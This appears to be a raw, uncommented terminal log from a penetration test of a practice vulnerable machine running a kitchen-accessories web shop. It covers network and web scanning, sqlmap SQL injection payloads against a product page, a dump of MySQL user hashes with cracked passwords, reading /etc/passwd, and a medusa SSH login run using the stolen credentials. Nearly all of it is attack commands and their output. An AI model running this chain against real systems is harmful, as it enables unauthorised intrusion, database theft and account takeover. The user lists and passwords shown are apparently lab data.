root@kali:~# netdiscover
Currently scanning: 192.168.70.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.1.120 08:00:27:df:b1:1d 01 060 CADMUS COMPUTER SYSTEMS
192.168.56.1 08:00:27:00:e0:df 01 060 CADMUS COMPUTER SYSTEMS
192.168.56.100 08:00:27:15:a3:c4 01 060 CADMUS COMPUTER SYSTEMS
root@kali:~# unicornscan -mT 192.168.1.120
Main [Error route.c:76] no route to host for `192.168.1.120/32'
Main exiting cant get interface(s) for target(s) from route table
root@kali:~# ifconfig eth0 192.168.1.121 netmask 255.255.255.0
root@kali:~# unicornscan -mT 192.168.1.120
TCP open ftp[ 21] from 192.168.1.120 ttl 64
TCP open ssh[ 22] from 192.168.1.120 ttl 64
TCP open http[ 80] from 192.168.1.120 ttl 64
TCP open https[ 443] from 192.168.1.120 ttl 64
TCP open mysql[ 3306] from 192.168.1.120 ttl 64
root@kali:~# nmap -sV -A 192.168.1.120 -pT:21,22,80,443,3306
Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-13 11:23 CET
Nmap scan report for 192.168.1.120
Host is up (0.00038s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_dr-xr-xr-x 2 0 0 40 Jan 2 2011 incoming
22/tcp open ssh OpenSSH 5.1 (protocol 2.0)
| ssh-hostkey: 1024 d5:92:37:32:f2:29:49:a1:3e:4f:cf:53:49:30:de:97 (DSA)
|_2048 6f:5a:87:f2:e9:b7:68:85:d7:b9:e5:e1:7f:92:c8:1e (RSA)
80/tcp open http Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Primaline :: Quality Kitchen Accessories
443/tcp open ssl/http Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Primaline :: Quality Kitchen Accessories
| ssl-cert: Subject: commonName=localhost/organizationName=Apache Friends/stateOrProvinceName=Berlin/countryName=DE
| Not valid before: 2004-10-01T08:10:30+00:00
|_Not valid after: 2010-09-30T08:10:30+00:00
|_ssl-date: 2014-01-13T10:23:39+00:00; -1s from local time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_IDEA_128_CBC_WITH_MD5
| SSL2_RC2_CBC_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_CBC_128_CBC_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 08:00:27:DF:B1:1D (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.38 ms 192.168.1.120
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds
root@kali:~# nc 192.168.1.120 21
220 ProFTPD 1.3.2 Server (Primaline FTP Server) [192.168.1.120]
^C
root@kali:~# ssh root@192.168.1.120
The authenticity of host '192.168.1.120 (192.168.1.120)' can't be established.
RSA key fingerprint is 6f:5a:87:f2:e9:b7:68:85:d7:b9:e5:e1:7f:92:c8:1e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.120' (RSA) to the list of known hosts.
root@192.168.1.120's password:
Permission denied, please try again.
root@192.168.1.120's password:
Permission denied, please try again.
root@192.168.1.120's password:
Permission denied (publickey,password,keyboard-interactive).
root@kali:~# nikto -host 192.168.1.120
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.1.120
+ Target Hostname: 192.168.1.120
+ Target Port: 80
+ Start Time: 2014-01-13 11:27:44 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
+ Retrieved x-powered-by header: PHP/5.2.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 8428, size: 30894, mtime: 0x4303112ee9900
+ mod_apreq2-20051231/2.6.0 appears to be outdated (current is at least 2.6.1)
+ mod_perl/2.0.4 appears to be outdated (current is at least 2.0.7)
+ Apache/2.2.11 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ mod_ssl/2.2.11 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.2.9 appears to be outdated (current is at least 5.4.4)
+ Perl/v5.10.0 appears to be outdated (current is at least v5.14.2)
+ OpenSSL/0.9.8k appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ OSVDB-3268: /webalizer/: Directory indexing found.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431.
+ OSVDB-3233: /cgi-bin/test-cgi: Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 22 item(s) reported on remote host
+ End Time: 2014-01-13 11:27:59 (GMT1) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# cd /usr/share/dirb
root@kali:/usr/share/dirb# dirb http://192.168.1.120
-----------------
DIRB v2.21
By The Dark Raver
-----------------
START_TIME: Mon Jan 13 11:28:36 2014
URL_BASE: http://192.168.1.120/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: http://192.168.1.120/ ----
+ http://192.168.1.120/cgi-bin/ (CODE:403|SIZE:1122)
+ http://192.168.1.120/favicon.ico (CODE:200|SIZE:30894)
+ http://192.168.1.120/index.php (CODE:200|SIZE:1325)
==> DIRECTORY: http://192.168.1.120/phpmyadmin/
==> DIRECTORY: http://192.168.1.120/webalizer/
root@kali:/usr/share/dirb# nikto -host 192.168.1.120 -port 443
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.1.120
+ Target Hostname: 192.168.1.120
+ Target Port: 443
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=DE/ST=Berlin/L=Berlin/O=Apache Friends/CN=localhost
Ciphers: DHE-RSA-AES256-SHA
Issuer: /C=DE/ST=Berlin/L=Berlin/O=Apache Friends/CN=localhost
+ Start Time: 2014-01-13 11:32:18 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
+ Retrieved x-powered-by header: PHP/5.2.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ Hostname '192.168.1.120' does not match certificate's CN 'localhost'
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 8428, size: 30894, mtime: 0x4303112ee9900
+ mod_apreq2-20051231/2.6.0 appears to be outdated (current is at least 2.6.1)
+ mod_perl/2.0.4 appears to be outdated (current is at least 2.0.7)
+ Apache/2.2.11 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ mod_ssl/2.2.11 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.2.9 appears to be outdated (current is at least 5.4.4)
+ Perl/v5.10.0 appears to be outdated (current is at least v5.14.2)
+ OpenSSL/0.9.8k appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ OSVDB-3268: /webalizer/: Directory indexing found.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431.
+ OSVDB-3233: /cgi-bin/test-cgi: Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 23 item(s) reported on remote host
+ End Time: 2014-01-13 11:34:35 (GMT1) (137 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:/usr/share/dirb# dirb https://192.168.1.120
-----------------
DIRB v2.21
By The Dark Raver
-----------------
START_TIME: Mon Jan 13 11:35:44 2014
URL_BASE: https://192.168.1.120/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: https://192.168.1.120/ ----
+ https://192.168.1.120/cgi-bin/ (CODE:403|SIZE:1122)
+ https://192.168.1.120/favicon.ico (CODE:200|SIZE:30894)
+ https://192.168.1.120/index.php (CODE:200|SIZE:1325)
==> DIRECTORY: https://192.168.1.120/phpmyadmin/
==> DIRECTORY: https://192.168.1.120/webalizer/
index.php
<p><a href=index.php>Home</a> <a href=add_product.php>Add Product</a> <a href=products.php>View Products</a></p>
add_product.php
<form action="insert_products.php" method="POST">
products.php
<form action="products.php" method="GET">
http://192.168.1.120/insert_products.php
product=prod&description=desc&price=1
--
root@kali:/usr/share/dirb# nc 192.168.1.120 3306
Host '192.168.1.121' is not allowed to connect to this MySQL server
http://192.168.1.120/phpmyadmin/setup/
http://192.168.1.120/phpmyadmin/Documentation.htm
phpMyAdmin 3.1.3.1 Documentation
http://192.168.1.120/products.php?id=1
root@kali:~# sqlmap -u "http://192.168.1.120/products.php?id=1"
...
[12:03:02] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 37 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 8867=8867
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x71676e6871,0x4f5255754b6446647646,0x7176646171),NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---
[12:03:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.11, PHP 5.2.9
back-end DBMS: MySQL 5.0.11
[12:03:24] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/192.168.1.120'
[*] shutting down at 12:03:24
--dbs
[12:04:45] [INFO] fetching database names
available databases [6]:
[*] cdcol
[*] information_schema
[*] merch
[*] mysql
[*] phpmyadmin
[*] test
Database: cdcol
Table: cds
[3 entries]
+----+------+-----------------------------------+------------------+
| id | jahr | titel | interpret |
+----+------+-----------------------------------+------------------+
| 1 | 1990 | Beauty | Ryuichi Sakamoto |
| 4 | 2001 | Goodbye Country (Hello Nightclub) | Groove Armada |
| 5 | 1997 | Glee | Bran Van 3000 |
+----+------+-----------------------------------+------------------+
Database: mysql
Table: user
[50 entries]
+------------+------------------------------------------------------+
| User | Password |
+------------+------------------------------------------------------+
| aadams | *90837F291B744BBE86DF95A37D2B2524185DBBF5 (whatever) |
| aallen | *22AC3D548EB2C2A2F4E609ADA63251D0AF795AD9 (nintendo) |
| aard | *4DC6D98E4CF6200B9F5529AFDE2E3B909F41E4D0 (kotaku) |
| aharp | *74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3 (passw0rd) |
| aheflin | *2A032F7C5BA932872F0F045E0CF6B53CF702F2C5 (654321) |
| amaynard | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 (123456) |
| aspears | *A5892368AE83685440A1E27D012306B073BDF5B7 (monkey) |
| aweiland | *E56A114692FE0DE073F9A1DD68A00EEB9703F3F1 (123123) |
| bbanter | *CFBF459D9D6057BC2A85477A38327B96F06B1597 (iloveyou) |
| bphillips | *D6B63C1953E7F096DB307F8AC48C4AD703E57001 (sunshine) |
| bwatkins | *AE9F960F8FA0994C9878D2245DA640EAFF09BA0E (superman) |
| cchisholm | *6A7A490FB9DC8C33C2B025A91737077A7E9CC5E5 (1234567) |
| ccoffee | *2CE4701D02A76C12CD513109CA16967A68B4C23A (princess) |
| dcooper | *3B477BC23EA39BFF66D64BFB68DB5EC5F5E31C91 (consumer) |
| dgilfillan | *6691484EA6B50DDDE1926A220DA01FA9E575C18A (abc123) |
| dgrant | *7FD9F123C9FC025372A5AAD19D107783CD19CCF7 (cheese) |
| djohnson | *FD571203974BA9AFE270FE62151AE967ECA5E0AA (111111) |
| dstevens | *B021918A5DCA54916CF724573179571DFC37AC88 (jennifer) |
| dtraylor | *24B8599BAF46DD4B4D8DB50A3B10136457492622 (starwars) |
| dwestling | *446525BB82B5E22BD9E525261D37C494F623C52B (blahblah) |
| hlovell | *DF216F57F1F2066124E1AA5491D995C3CB57E4C2 (welcome) |
| jalcantar | *44FFB04331ADAECB1FAB104F634E9B066BF8C6DC (pokemon) |
| jalvarez | *B2B366CA5C4697F31D4C55D61F0B17E70E5664EC (666666) |
| jayala | *DB1B792EC6DAE393BAE7AD832D3AF207C12E9A00 (michael) |
| jbresnahan | *FBA7C2D27C9D05F3FD4C469A1BBAF557114E5594 (Password) |
| jdavenport | *61305383748FBEAB119F9A8BC35EBBADB4889A9D (babyl0n) |
| jduff | *46CFC7938B60837F46B610A2D10C248874555C14 (trustno1) |
| jfranklin | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 (password) |
| kclemons | *C5FEAC8A32D4FAFF1EF681447DA706634352AFF8 (killer) |
| krenfro | *D183105443FBDE597607B8BC5475A9E1B7847F3E (gizmodo) |
| ktso | *81101DED975D54BD76A3C8EAD293597AE9BB143F (computer) |
| kwebber | *79BF466BCC601BD91A0897BB162421F9BA8C29CA (lifehack) |
| lmartinez | *ED043A01F4583450BC8EB1E83C00C372CA49C4E4 (michelle) |
| lmorales | *8D6A637F37955DBFCE1229204DDBED1CE11E6F41 (master) |
| mbryan | *626AC8265C7D53693CB7478376CE1B4825DFF286 (pepper) |
| mholland | *51AA306E66303073DBA15D2750E23C90C7A7F947 (baseball) |
| mnader | *94F3DC3F398B76269CAAD51627279D4233A6C89A (soccer) |
| mrodriguez | *A7D31514D37A55CE91C6C5DF97299CBC1B1937EC (jordan) |
| myajima | *00A51F3F48415C7D4E8908980D443C29C69B60C9 (12345) |
| qpowers | *84AAC12F54AB666ECFC2A83C676908C8BBC381B1 (12345678) |
| rdominguez | *3EEB06BE54EABF909DC8F6107110777F1DE43186 (gawker) |
| rjacobson | *797420C584EBF42750EB523104268BA0FD87FBC8 (internet) |
| rpatel | *B12289EEF8752AD620294A64A37CD586223AB454 (0) |
| sgains | *F491287896471CB21030790BF46865C4A39DE651 (batman) |
| sjohnson | *FCAAF3F0BD94C027B2769A95903C355CE6294660 (football) |
| strammel | *F8E113FD51D520075836A4B815568BA2B96F7C30 (dragon) |
| swarren | *7B2F14D9BB629E334CD49A1028BD85750F7D3530 (shadow) |
| tdeleon | *AA1420F182E88B9E5F874F6FBE7459291E8F4601 (qwerty) |
| tgoodchap | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) |
| webapp | *0DCC22A95EEBFF4984DF6A7B7F2D7D28DBB5F36F |
+------------+------------------------------------------------------+
root@kali:~# sqlmap -u "http://192.168.1.120/products.php?id=1" --file-read=/etc/passwd
root@kali:~# cat /usr/share/sqlmap/output/192.168.1.120/files/_etc_passwd
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/false
ftp:x:14:50::/home/ftp:/bin/false
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
qpowers:x:1000:100:Quinton Powers:/home/qpowers:
mbryan:x:1001:100:Michael Bryan:/home/mbryan:
dgrant:x:1002:100:Daniel Grant:/home/dgrant:
dgilfillan:x:1003:100:Darcy Gilfillan:/home/dgilfillan:
jbresnahan:x:1004:100:Jay Bresnahan:/home/jbresnahan:
aadams:x:1005:100:Adam Adams:/home/aadams:
aweiland:x:1006:100:Adam Weiland:/home/aweiland:
cchisholm:x:1007:100:Cindy Chisholm:/home/cchisholm:
jfranklin:x:1008:100:Johnny Franklin:/home/jfranklin:
hlovell:x:1009:100:Henrietta Lovell:/home/hlovell:
bphillips:x:1010:100:Brad Phillips:/home/bphillips:
myajima:x:1011:100:Moto Yajima:/home/myajima:
jalcantar:x:1012:100:Jesse Alcantar:/home/jalcantar:
jayala:x:1013:100:John Ayala:/home/jayala:
aard:x:1014:100:Aaron Ard:/home/aard:
aharp:x:1015:100:Annie Harp:/home/aharp:
lmorales:x:1016:100:Lindsey Morales:/home/lmorales:
kclemons:x:1017:100:Kathryn Clemons:/home/kclemons:
tgoodchap:x:1018:100:Taj Goodchap:/home/tgoodchap:
tdeleon:x:1019:100:Terrence Deleon:/home/tdeleon:
krenfro:x:1020:100:Kimberly Renfro:/home/krenfro:
bbanter:x:1021:100:Bob Banter:/home/bbanter:
aspears:x:1022:100:Adam Spears:/home/aspears:
djohnson:x:1023:100:Daniel Johnson:/home/djohnson:
aheflin:x:1024:100:Anna Heflin:/home/aheflin:
jdavenport:x:1025:100:James Davenport:/home/jdavenport:
sgains:x:1026:100:Susan Gains:/home/sgains:
swarren:x:1027:100:Samuel Warren:/home/swarren:
rdominguez:x:1028:100:Rafael Dominguez:/home/rdominguez:
ktso:x:1029:100:Kristen Tso:/home/ktso:
amaynard:x:1030:100:Arthur Maynard:/home/amaynard:
lmartinez:x:1031:100:Luis Martinez:/home/lmartinez:
dwestling:x:1032:100:David Westling:/home/dwestling:
dtraylor:x:1033:100:Donnie Traylor:/home/dtraylor:
jalvarez:x:1034:100:Joy Alvarez:/home/jalvarez:
mrodriguez:x:1035:100:Manuel Rodriguez:/home/mrodriguez:
rjacobson:x:1036:100:Randy Jacobson:/home/rjacobson:
dcooper:x:1037:100:Donald Cooper:/home/dcooper:
mholland:x:1038:100:Marian Holland:/home/mholland:
aallen:x:1039:100:Aaron Allen:/home/aallen:
ccoffee:x:1040:100:Chad Coffee:/home/ccoffee:
sjohnson:x:1041:100:Steven Johnson:/home/sjohnson:
bwatkins:x:1042:100:Brandon Watkins:/home/bwatkins:
kwebber:x:1043:100:Kathleen Webber:/home/kwebber:
rpatel:x:1044:100:Randall Patel:/home/rpatel:
jduff:x:1045:100:Jerry Duff:/home/jduff:
mnader:x:1046:100:Muhammad Nader:/home/mnader:
strammel:x:1047:100:Stephanie Trammel:/home/strammel:
dstevens:x:1048:100:Donald Stevens:/home/dstevens:
root@kali:~# pico user_pass-txt
:aadams:whatever
:aallen:nintendo
:aard:kotaku
:aharp:passw0rd
:aheflin:654321
:amaynard:123456
:aspears:monkey
:aweiland:123123
:bbanter:iloveyou
:bphillips:sunshine
:bwatkins:superman
:cchisholm:1234567
:ccoffee:princess
:dcooper:consumer
:dgilfillan:abc123
:dgrant:cheese
:djohnson:111111
:dstevens:jennifer
:dtraylor:starwars
:dwestling:blahblah
:hlovell:welcome
:jalcantar:pokemon
:jalvarez:666666
:jayala:michael
:jbresnahan:Password
:jdavenport:babyl0n
:jduff:trustno1
:jfranklin:password
:kclemons:killer
:krenfro:gizmodo
:ktso:computer
:kwebber:lifehack
:lmartinez:michelle
:lmorales:master
:mbryan:pepper
:mholland:baseball
:mnader:soccer
:mrodriguez:jordan
:myajima:12345
:qpowers:12345678
:rdominguez:gawker
:rjacobson:internet
:rpatel:0
:sgains:batman
:sjohnson:football
:strammel:dragon
:swarren:shadow
:tdeleon:qwerty
:tgoodchap:letmein
root@kali:~# medusa -h 192.168.1.120 -C user_pass-txt -M ssh -v 6
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
GENERAL: Parallel Hosts: 1 Parallel Logins: 1
GENERAL: Total Hosts: 1
GENERAL: Total Users: [combo]
GENERAL: Total Passwords: [combo]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aadams (1 of 49, 0 complete) Password: whatever (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aadams Password: whatever [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aallen (2 of 49, 1 complete) Password: nintendo (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aallen Password: nintendo [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aard (3 of 49, 2 complete) Password: kotaku (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aard Password: kotaku [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aharp (4 of 49, 3 complete) Password: passw0rd (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aharp Password: passw0rd [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aheflin (5 of 49, 4 complete) Password: 654321 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aheflin Password: 654321 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: amaynard (6 of 49, 5 complete) Password: 123456 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: amaynard Password: 123456 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aspears (7 of 49, 6 complete) Password: monkey (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aspears Password: monkey [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aweiland (8 of 49, 7 complete) Password: 123123 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aweiland Password: 123123 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: bbanter (9 of 49, 8 complete) Password: iloveyou (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: bbanter Password: iloveyou [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: bphillips (10 of 49, 9 complete) Password: sunshine (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: bphillips Password: sunshine [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: bwatkins (11 of 49, 10 complete) Password: superman (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: bwatkins Password: superman [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: cchisholm (12 of 49, 11 complete) Password: 1234567 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: cchisholm Password: 1234567 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: ccoffee (13 of 49, 12 complete) Password: princess (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: ccoffee Password: princess [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dcooper (14 of 49, 13 complete) Password: consumer (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dcooper Password: consumer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dgilfillan (15 of 49, 14 complete) Password: abc123 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dgilfillan Password: abc123 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dgrant (16 of 49, 15 complete) Password: cheese (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dgrant Password: cheese [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: djohnson (17 of 49, 16 complete) Password: 111111 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: djohnson Password: 111111 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dstevens (18 of 49, 17 complete) Password: jennifer (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dstevens Password: jennifer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dtraylor (19 of 49, 18 complete) Password: starwars (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dtraylor Password: starwars [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dwestling (20 of 49, 19 complete) Password: blahblah (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dwestling Password: blahblah [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: hlovell (21 of 49, 20 complete) Password: welcome (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: hlovell Password: welcome [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jalcantar (22 of 49, 21 complete) Password: pokemon (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jalcantar Password: pokemon [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jalvarez (23 of 49, 22 complete) Password: 666666 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jalvarez Password: 666666 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jayala (24 of 49, 23 complete) Password: michael (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jayala Password: michael [SUCCESS]
